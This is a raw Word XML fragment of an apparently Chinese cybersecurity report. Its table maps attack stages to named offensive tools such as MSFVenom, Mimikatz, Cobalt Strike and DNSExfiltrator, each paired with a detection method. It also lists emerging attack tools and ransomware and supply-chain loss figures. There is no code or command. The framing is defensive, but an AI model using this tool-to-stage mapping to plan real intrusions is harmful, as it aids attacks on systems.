          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻击手段与工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35"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="2855"/>
        <w:gridCol w:w="2469"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4AD9941D" w14:textId="77777777" w:rsidTr="00501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925607B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攻击阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="112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9F31019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技术手段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="161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CBD5884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代表性工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="139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6F973BB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检测方法</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3471AE9B" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18140BCE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rFonts w:cs="Times New Roman"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A00E83">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>侦察</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5415AD8F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rFonts w:cs="Times New Roman"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网络测绘</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5EB02AFA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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Shodan/Censys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="276DA578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蜜罐系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="17D51185" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="08444B20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rFonts w:cs="Times New Roman"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武器化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3F02C3CC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rFonts w:cs="Times New Roman"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恶意软件生成</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="681E3349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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>MSFVenom/QuasarRAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69A270FA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沙箱动态分析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="57C87B69" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="640DE7F7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交付</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0488E7F8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钓鱼攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1337C487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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>GoPhish/Setoolkit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5D7B21B1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邮件网关检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7A1A3588" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="41334B81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利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67E45DF7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漏洞利用</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3EF5BF39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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Metasploit/ExploitDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74B5B629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IDS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签名检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="05312007" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A849F4F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权限提升</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CE0921C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提权漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3E52120A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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>LinPEAS/WinPEAS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6D8AE99D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权限最小化原则</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3DB81BBA" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48A666E9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横向移动</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="32C6E597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密码爆破</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1362AFBE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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Mimikatz/BloodHound</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BFCD65A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异常登录告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1452AAEF" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5B0C9106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持久化</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0C2486F3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后门安装</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7059BDBD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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Cobalt Strike</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3DD0F4F8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文件完整性监控</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="04A17C88" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="42744853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数据渗出</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1122" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="02076628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隐蔽通道</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1614" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70E6C360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sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>DNSExfiltrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5FE23894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DLP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数据泄露防护</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42331D10" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEEB65F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新兴威胁工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D71FE6" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>云环境攻击：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pacu</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>渗透框架）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEF75AD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>物联网攻击：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（僵尸网络源码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29822D63" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>辅助攻击：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DeepExploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AI</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动化渗透）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02140A02" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>常见网络安全风险全景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D09670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 xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>技术层风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E282ADF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>最终目标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55"/>
        <w:gridCol w:w="5289"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="0F388EA8" w14:textId="77777777" w:rsidTr="00501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60171DF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风险类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="29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7A4F15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潜在损失</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7E20B705" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="07C57516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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>勒索软件攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2990" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3D298D5B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$4.62M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（平均赎金）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="40FA0C01" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="481A2849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rFonts w:cs="Times New Roman"/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供应链攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2990" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2E8860E5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SolarWinds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损失超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$18B</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="1625C565" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="53AB61E5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API</w:t>
            </w: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安全漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2990" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70D77EBB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数据批量泄露风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="76B0C7EC" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4212781A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云配置错误</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2990" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="59965110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S3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桶公开导致数据泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="76F2A543" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BAF758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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>人为层风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AFDC7D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
